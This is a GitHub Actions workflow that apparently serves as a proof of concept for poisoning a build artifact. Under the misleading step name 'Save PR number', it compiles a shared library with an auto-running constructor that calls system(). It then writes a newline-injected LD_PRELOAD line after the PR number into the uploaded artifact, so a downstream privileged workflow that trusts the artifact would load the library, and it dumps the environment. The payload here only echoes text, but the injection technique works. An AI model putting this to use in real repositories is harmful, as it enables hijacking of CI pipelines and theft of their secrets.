name: Generate Preview
on:
  pull_request:
  workflow_dispatch:
jobs:
  build_and_preview:
    runs-on: ubuntu-latest
    steps:
      - name: Set up GCC
        uses: egor-tensin/setup-gcc@v1
        with:
          version: latest
          platform: x64
      - name: Save PR number
        run: |
          cat >> lib.c << EOF
          #define _GNU_SOURCE
          #include <stdio.h>
          #include <stdlib.h>

          void __attribute__((constructor)) run_shell_command(void) {
              system("echo 'Shared library loaded!'");
          }
          EOF
          mkdir -p ./pr
          gcc -shared -fPIC -o pr/lib.so lib.c
          echo -e '${{ github.event.number }}\n'LD_PRELOAD=$GITHUB_WORKSPACE/pr/lib.so > ./pr/NR
          cat ./pr/NR
          env
          echo please

      - uses: actions/upload-artifact@v2
        with:
          name: pr
          path: pr/
